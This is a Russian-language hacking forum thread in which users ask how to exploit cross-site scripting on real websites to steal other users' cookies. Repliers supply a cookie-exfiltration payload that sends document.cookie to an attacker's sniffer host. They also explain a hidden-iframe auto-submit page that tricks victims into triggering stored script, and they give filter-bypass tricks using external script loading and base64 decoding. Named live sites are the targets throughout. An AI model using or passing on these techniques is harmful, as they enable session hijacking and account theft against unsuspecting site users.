Выполнился javascript код, расположенный между тэгами. Это была проверка. Теперь для кражи нужно вставить код, который будет воровать куки. Он представлен в сниффере. Вставляешь и отправляешь на страницу уже "ядовитый код". Хотя не факт, что код будет работать - могут фильтроваться некоторые символы непосредственно в коде, нарушая его работоспособность. Тогда надо будет искать другие способы отправки без использования фильтрованных символов или искать дополнительные способы обхода. Поэтому чтобы хорошо владеть мастерством кросс-сайтового скриптинга, надо знать javascript, иметь свой сниффер, написанный желательно вручную под свои прихоти. И понимать системы фильтрации.

Цитата:


При активной XSS нужно будет жертве давать ссылку или она (XSS) будет в коде страницы до тех пор, пока админ её не спалит?



Да, активная XSS сохраняется на сервере.

lex1094
24.07.2012, 01:00
Цитата:

Сообщение от Nick Hander

Ну в общем, у тебя например прошло

code:

">alert()

Вставляешь и отправляешь на страницу уже "ядовитый код".

Код вставлять в адресную строку или в форму в которой обнаружилась XSS?

Nick Hander
24.07.2012, 01:00
Смотря как обнаружил эту XSS.

lex1094
24.07.2012, 01:00
Цитата:

Сообщение от Nick Hander

Смотря как обнаружил эту XSS.

XSS обнаружена в форме ввода некоторых данных.
P.S. Можем в ICQ поговорить на эту тему?

PollyWC
30.07.2012, 01:00
Привет! При использовании пассивки не приходят куки на сниффер. Нашел, что проблема в защите браузеров. Можно подробнее описать обход?

M@ZAX@KEP
31.07.2012, 01:00
Ищи вектор под твой браузер, пробуй, экспериментируй: html5sec.org

Kiebling
09.08.2012, 01:00
Нашел XSS на сайте fc-zenit.ru
http://fc-zenit.ru/main/news/?ns=1&t...3C%2Fscript%3E (https://hpc.name/redirector.html#http://fc-zenit.ru/main/news/?ns=1&tx=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2F XSS%2F%29%3C%2Fscript%3E)

Объясните, что делать дальше с этим кодом? Если я хочу взломать пользователя сайта, то есть, угнать его куки, и как мне можно замаскировать код, можно ли сделать картинку заместо ссылки?

M@ZAX@KEP
24.08.2012, 01:00
Статью перечитай. Там всё написано. Для тебя специально же писал.

iHouse
27.08.2012, 01:00
снифер перезалей

virtuoso_
27.08.2012, 01:00
Парни помогите обойти HttpOnly. Объясните по подробнее. Я прочитал пару статей на подобие этой http://raz0r.name/articles/httponly-bypass/ (https://hpc.name/redirector.html#http://raz0r.name/articles/httponly-bypass/) но все равно не чего не понял.

ferluce666
31.10.2012, 01:00
Всем привет, подскажите чайнику, я отправляю человеку скрипт
img = new Image(); img.src = "http://httpz.ru/n6sy94cxrff.gif?"+document.cookie;

он по нему переходит а на снифер приходит следующее :
31.10.2012 11:50:50 +02:00 []
IP: empty
Query: empty
REFERER: http://m.odnoklassniki.ru/dk?st.cmd=...=link&tkn=5905 (https://hpc.name/redirector.html#http://m.odnoklassniki.ru/dk?st.cmd=outLinkWarning&st.cln=off&st.rtu=%252Fdk%253Fst.cmd%253DuserMsgs%2526amp%253 Bst.chatWith%253Doygyxhxfuzwgnywgrmb0qpgsubssmcdcy wnjoz%2526amp%253Btkn%253D6622%2523lst&st.rfn=http%3A%2F%2Fhttpz.ru%2Fa6sy94cxrff.gif&st.typ=link&tkn=5905)
AGENT: Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.30362/28.2794; U; ru) Presto/2.8.119 Version/11.10 подскажите почему куки не приходят? что я делаю не правильно? заранее спасибо

Bugatti15047
18.12.2012, 01:00
Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Если я пишу так:

source:



alert("document.cookie");



Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?

iHack3R
18.12.2012, 01:00
Цитата:

Сообщение от Bugatti15047

Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?

JavaScript highlight



img =
new
Image
(); img.
src
=
"адрес сниффера?"
+
document
.
cookie
;

Bugatti15047
18.12.2012, 01:00
iHack3R,
Дак если я отправлю

source:



img = new Image(); img.src = "адрес сниффера?"+document.cookie;



Жертве, разве сработает? Где в скрипте строчка, что она должна работать именно на моем сайте?

Bugatti15047
19.12.2012, 01:00
HPC'офцы =)
Помогите пожалуйста новичку
Поиск фильтрует ">", но в комментариях пропускает

source:



alert("xss");



IMAGE (https://hpc.name/redirector.html#http://4put.ru/pictures/max/483/1483881.jpg) http://4put.ru/pictures/max/483/1483881.jpg

Если прописывать

source:



img = new Image(); img.src = "адрес сниффера?"+document.cookie;



Все шикарно, на снифер отсылаются cookie
IMAGE (https://hpc.name/redirector.html#http://4put.ru/pictures/max/483/1483888.jpg) http://4put.ru/pictures/max/483/1483888.jpg

Но как же реализовать такую ссылку, по которой переходя, жертва (пользователь сайта)
Отошлет мне cookie, я ведь не могу воспользоваться этим

source:



img = new Image(); img.src = "адрес сниффера?"+document.cookie;



Отправка cookies, ведь, произойдет только в том случае, если жертва сама вобьет этот скрипт в коммент?

Nick Hander
19.12.2012, 01:00
Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.

p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)

Bugatti15047
19.12.2012, 01:00
Цитата:

Сообщение от Nick Hander

Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.

p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)

Однозначно на сайте пассивка,
Проблема в том, что я не могу ее реализовать,
Если бы она была через поиск, я бы смог (есть пример как)
А через коммент, я понятия не имею
Нужно каким то образом составить ссылку,с этим скриптом + скриптом сниффера,
Как это реализовать, я не знаю

Не могли бы вы подсказать?

Nick Hander
19.12.2012, 01:00
Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body

Цитата:






Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.

Have fun!

Bugatti15047
19.12.2012, 01:00
Цитата:

Сообщение от Nick Hander

Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body

подробнее об этом почтитай в статье об CSRF (Cross Site Request Forgery). Она здесь есть. Затем на первую страницу поставь эту страницу с скрытом фрейме

Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.

Have fun!

Читаю, читает так легко!
Вопрос, нужен платный хостинг или сойдет любой?

И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста

И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи

noizZzefan
19.12.2012, 01:00
Цитата:

Сообщение от Bugatti15047

Читаю, читает так легко!
Вопрос, нужен платный хостинг или сойдет любой?

И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста

И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи

Знаешь, только Nick Hander расписал тебе настолько хорошо, что даже те кто не в теме поняли=)
Да и вообще, Nick всегда хорошо пишет !(отдельное спасибо)

Постараюсь объяснить, как сам понял.
Вообщем, сделай две странички.
На первой размести скрипт формы.
Его нужно поискать на странице, например :

HTML highlight



Ваш псевдоним :

Текст комментария :


Допустим ты нашёл что-то похожее.
Теперь, вставь такой код на страницу, которую ты создал(а у нас их две =) )

HTML highlight



Ваш псевдоним :

Текст комментария :

...

И сохрани эту первую страничку с названием 1.html.
Теперь создай вторую страничку.
Там напиши это :

HTML highlight




Теперь, если ты зайдешь на вот эту вторую страницу, у тебя автоматически отправится комментарий, с кодом для кражи кукисов =)

Nick Hander
19.12.2012, 01:00
Цитата:


noizZzefan



Пасиб за комплименты и за то, что расписал подробнее=) Я именно это имел в виду.

На самом деле незнающему человеку действительно не совсем понятно будет то, что я сказал. И самостоятельно выполнить это можно будучи знакомым с сутью уязвимостей, сутью xss и csrf. Так что тут действительно нужно более подробно разъяснить.

Цитата:


Bugatti15047



В дополнение к сказанному noizZzefan'ом отвечу на вопросы, которые ты мне лично задал.

Вопрос, нужен платный хостинг или сойдет любой?
Сойдет любой, даже без поддержки php. Пойдет и юкоз. Фокус в том, что тебе надо будет заманить жертву на свою страницу, которая ему будет интересна. Можно просто с копипастить страницу, как ты предполагаешь, интересную жертве (делается, например, через teleport или сохранением страницы как html документ с изображениями через оперу), и залить ее себе на хост. В ней уже прописывать фрейм. Факт в том, что пользователя может смутить домен "ucoz.net" или что-то в этом роде. Если боишься, что пользователь начнет подозревать, то придется тогда регать домен второго уровня, например в зоне .ru. Но хостинг платный делать совсем не обязательно.

И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста
Она в этом же форуме, закреплена в важных темах даже - XSRF (хотя правильнее называть CSRF, также как и XSS - CSS, правда css правильнее ассоциировать совсем с другим=))

iHack3R
19.12.2012, 01:00
Bugatti15047 XSRF (https://hpc.name/showthread.php?t=16326)

Bugatti15047
19.12.2012, 01:00
noizZzefan, Nick Hander,
Огромное вам спасибо.
Будем пытаться!

kotytki123456
06.01.2013, 01:00
помогла

EIONS
28.01.2013, 01:00
Люди срочно нужна помощь с xss, очень срочно ПОЖ! напишите в скайп, чтобы я мог показать экран tema-ass (я 1 в списке)

Exotic
24.02.2013, 01:00
А что делать, если после подставки вход не осуществился и я не оказался в аккаунте жертвы? Это уже косяк скрипта?

qwertyyy
27.02.2013, 01:00
в 19 версии Firefox в адресной строке не срабатывает javascript самодостаточной XSS,а через консоль выдает ошибку, а в Опере и Хроме все работает

Nigerman666
22.03.2013, 01:00
у меня на нашем hpc снифере не приходят куки!
Первый раз пришли (мои же), а потом вообще перестали. В чем проблема?

dddoomsday
24.03.2013, 01:00
всем дарова, пожалуйста помогите, я кажись не так понял) на движке DLE, на юзербаре тупо просто вставил ссылку на xss картинку вот таким образом [img.]http://мой хост/s.gif[/img.] .Это как я понял кажись активный XSS, если юзеры посмотрят тему с моим комментом, то приходит на мой сниффер их айпи, юзер агент и реферер НО QUERY пустой!. Что я не так делаю?

M@ZAX@KEP
26.03.2013, 01:00
Цитата:


тупо просто вставил ссылку



Это не XSS вообще. Поэтому и запрос пустой.

dddoomsday
28.03.2013, 01:00
[img.]http://мой хост/s.gif?"+document.cookie;[/img.]

Запрос вот так должен быть? такой запрос не работает на dle. картинки нету, то есть тупо отображается код. кажись Фильтруются символы [?],["],[;],[+] если вставить что то после /s.gif из этих символов то код перестает работать, опять же тупо отображается код.

duxanator2013
28.03.2013, 01:00
Можешь видео сделать ?

Nick Hander
28.03.2013, 01:00
dddoomsday
Чтобы обрабатывался скрипт, нужно код заключить в функциональный тэг script или атрибуты - обработчики событий. если ты просто запилишь картинку сниффера, куки не украдешь.

Nigerman666
28.03.2013, 01:00
у меня на нашем hpc снифере не приходят
куки!
Первый раз пришли (мои же), а потом вообще
перестали. В чем проблема?

dddoomsday
29.03.2013, 01:00
а спомощью bb тэга активный xss можно осуществить?

пожалуйста приведите примеры.

dddoomsday
30.03.2013, 01:00
почему молчите?

Nick Hander
30.03.2013, 01:00
dddoomsday
Теоретически можно, все зависит от фильтра на стороне сервера. XSS - это лишь явление, достичь его можно многими путями с помощью пентеста и экспериментирования.

Nigerman666
30.03.2013, 01:00
Мне кто-нибудь ответит?

HackSale
30.03.2013, 01:00
Используй другой сниффер, хз в чем проблема

noizZzefan
30.03.2013, 01:00
Цитата:

Сообщение от Nigerman666

Мне кто-нибудь ответит?

Было предположение что на атакуемом сайте дыру залотали ?

Nigerman666
30.03.2013, 01:00
Цитата:

Сообщение от noizZzefan

Было предположение что на атакуемом сайте дыру залотали ?

дыра осталась..

dddoomsday
30.03.2013, 01:00
Столкулся с такой проблемой, почему то редирект не работает, на одном сайте нашел пассивку, уязвимость существует на поисковике сайта.
Ядовитая ссылка: http://уязвимый.сайт.ру/search/all?q="> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie;
cookies приходит нормально), но ппц палится, просто на просто этот код "> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie; остается на поисковике уязвимого сайта и не направляет на другой сайт. В чем может быть проблема?

если использовать location.href ="http://адрес_редиректа/" то куки вообще не приходит.

Nigerman666
30.03.2013, 01:00
Где еще можно онлайн сниф заюзать?
А то на хосте мой сниф долго не живет((

M@ZAX@KEP
31.03.2013, 01:00
Бесплатные хостинги не валят.

imbadjkelvin
22.07.2013, 01:00
Помогите , Хелп

У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил :( , помогите нубу разобраться плс.

usernel366
04.01.2014, 01:00
мазахакер помоги со своим js.в общем самодостаточные скрипты снифают нормально,но работают в хроме.тут есть один минус.хром убирает надпись javascript в адресной строке(ну и конешно большой минус мало какой юзверь решится такое вставить себе в браузер и тем более что то то дописывать руками)в firefox самодостаточные вообще не выполняются(тупо никакой реакции).при выполнении скрипта происходит редирект на гугл но в логах ничего нет.тоже самое с картинкой
img = new Image(); img.src = "http://сайт/картинка.gif?"+document.cookie; хотя при выполнении самодостаточного все снифается.как переделать js так чтобы все работало и можно ли сделать скрипт который одинаково нормально будет работать и в ff и в chrome

usernel366
04.01.2014, 01:00
Цитата:

Сообщение от imbadjkelvin

Помогите , Хелп

У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил :( , помогите нубу разобраться плс.

что склеить то?залей его на хост.зайди в лог и тестируй на сайтах где есть xss.хотя у меня получилось только с самодостаточными скриптами.и то тока в хроме

rauf1324
18.01.2015, 01:00
либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы

">img = new Image(); img.src = \"http://site.ru4_1.gif?\"+document.cookie; как их закодировать? пробовал base не катит

rox@hak
18.01.2015, 01:00
попробуй испоLьзовать одинарные кавычки '

rauf1324
18.01.2015, 01:00
все равно такое пробывал

rox@hak
18.01.2015, 01:00
Цитата:

Сообщение от rauf1324

все равно такое пробывал

это не активка, а пасивка
там кавычки фильтруются, тебе нужно не сразу куки дергать а подгружать js
заливаешь на хостинг файл 1.js с содержанием

code:

img = new Image(); img.src = "http://site.ru4_1.gif?"+document.cookie;

и в поле где хсс вставляешь скрипт с адресом на загруженный js

code:

">

rauf1324
20.01.2015, 01:00
спасибо. вот такой вопрос сталкивался месяц назад

Фильтр фильтрует только но выполняет такой код
source:





как туда пихнуть свою ссылку
source:





так не получилось

таких тэгов много просто фильтрует но как в пропускаемые теги вставить ссылку не знаю, или они все для проверки?

rox@hak
20.01.2015, 01:00
для проверки кодируешь
source:



alert(1)



в бейс64
получится вот это -
source:


PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
==


вставляешь вместо своего javascript:alert() вот это -
source:


javascript:document.
write
(
atob
(
'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
))


если алерт сработал , то уже кодируешь свой скрипт в бейс64 типа
source:





вставляешь между кавычками после atob!
а вообще это один из множества вариантов!

rauf1324
20.01.2015, 01:00
блин и документ фильтрует
source:


javasсriрt:d��um�nt.
write


короче можно так сказать и документ заменяет на непонятные символы или удаляет, а все остальное могу вставить

rauf1324
20.01.2015, 01:00
вот этот скрипт выполняеться

...

только как внутрь пихнуть свой скрипт

rox@hak
20.01.2015, 01:00
а если такое вставить алерт появляется?

source:

rauf1324
20.01.2015, 01:00
нет изображ выходит когда вставляю
source:



...



алерт выходит, но куда прописать там скрипт не знаю

rox@hak
20.01.2015, 01:00
тогда подставь свой урл в строку
source:


document
.
write
(
''
);


после того как подставишь закодируй строку в бейс64
и подставь между кавычками после atob
получится типа этого

source:


...


P.S.
евал - выполнить
атоб - декодировать из бейс64

rauf1324
20.01.2015, 01:00
спасибо бро

rauf1324
08.04.2015, 01:00
Всем привет! остались два вопроса всего насчет xss, а так вполне могу использовать..

1 как в wap приложениях типа drugvokrug и т.д можно поискать xss (в общем и sql не помешает) то есть как выдать алерт
2 как обходить фильтр если все между скобками фильтр удаляет, категорически все кроме br и между кавычек бывает символ /

zoonim116
15.07.2015, 01:00
Всем привет, подскажите пожалуйста, перепробовал все что можно уже, методом исключения выяснил, что сервер фильтрует символ ">alert(/XSS/) на выходе '>">alert(/XSS/)

rox@hak
15.07.2015, 01:00
напиши в лс урл и что куда вводил

glm1997
17.08.2015, 01:00
Хотел спросить.
Есть сайты в которых при добавлении в коммент скрипта - активки , выдает алерт, но - это уж очень палевно, ибо админ - все видит.
Можно ли удаленно проверить - на наличие данной уязвимости ?
Если просто сохранить html - страницу, потом заменить коммент - на свой скрипт, то в любом случае он сработает, ибо - нет фильтрации.
Как можно скопировать страницу, учитывая все - фильтрации сайта.
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

maxarr
17.08.2015, 01:00
to glm1997 (https://hpc.name/member.php?u=164733)
Например так:

JavaScript highlight


location.
hash
=
'test'

console.log('test')

rauf1324
08.09.2015, 01:00
на неком сайте в гостевой книге выполняется

source:





но как бы не вставлял туда свою ссылку на снифф куки не приходят, объясните пож, что не так делаю

VKano02040504054
09.09.2015, 01:00
Цитата:

Сообщение от glm1997

Хотел спросить.
Есть сайты в которых при добавлении в коммент скрипта - активки , выдает алерт, но - это уж очень палевно, ибо админ - все видит.
Можно ли удаленно проверить - на наличие данной уязвимости ?
Если просто сохранить html - страницу, потом заменить коммент - на свой скрипт, то в любом случае он сработает, ибо - нет фильтрации.
Как можно скопировать страницу, учитывая все - фильтрации сайта.
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Никак, если фильтрация не производится JavaScrpt'ом, что бывает чаще всего, ведь в большинстве случаев фильтрацию производит именно сервер, а не клиент.

rox@hak
09.09.2015, 01:00
Цитата:

Сообщение от rauf1324

на неком сайте в гостевой книге выполняется

source:





но как бы не вставлял туда свою ссылку на снифф куки не приходят, объясните пож, что не так делаю

это просто вставка ифрейма, тоесть куки и не должны приходить!
поробуй onload дописать, если фильтрует попробуй вместо адреса вписать javascript:alert(1)

rauf1324
28.12.2015, 01:00
привет всем. помогите пожалуйста. такой случай.. фильтр удаляет только открывающую скобку " не удаляет, а удаляет. подскажите что можно сделать

Neo-pro
16.11.2016, 01:00
Раньше весело было Пасивками все делились) Я даже сам одну на mail.ru находил Сейчас всё тяжелее..